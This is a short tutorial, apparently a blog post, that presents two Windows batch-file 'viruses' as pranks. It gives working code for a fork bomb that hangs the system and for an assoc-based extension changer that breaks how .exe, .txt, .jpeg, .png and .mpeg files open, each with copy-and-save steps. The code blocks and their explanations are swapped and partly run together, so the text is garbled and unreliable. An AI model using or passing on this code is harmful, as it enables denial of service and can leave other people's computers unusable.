Hi Friends, today I'm going to share two Batch Files which create a lot of fun. I also get suffered by these viruses , let's learn how to create Fork Bomb And Extension Changer Virus:
Fork Bomb And Extension Changer Virus:
@echo offassoc .txt=anything // this command associates extension .txt with filetype anything. assoc .exe=anything assoc .jpeg=anything assoc .png=anything assoc .mpeg=anything
This code creates a large number of processes very quickly in order to saturate the process table of windows. It will just hang the windows .
As Usual Copy Below Code And Save As anything.bat
%0|%0 //Its percentage zero pipe percentage zero
Extension Changer Batch Virus Change Format Of File And Make Un accessible
Every extension is associated with a filetype,[gap]
EX: extension ‘exe’ is is associated with filetype ‘exefile’. To see them, just enter command ‘assoc’ in command prompt.
Above code changes the association of some extensions to filetype ‘anything’ (means u can write anything) which obviously doesn’t exist. So all exe (command prompt, paint,games and many more),jpeg,png,mpeg files wouldn't open properly.
Copy below code and save as anything.bat
in place of anything you can put which you want
EX: .exe=.him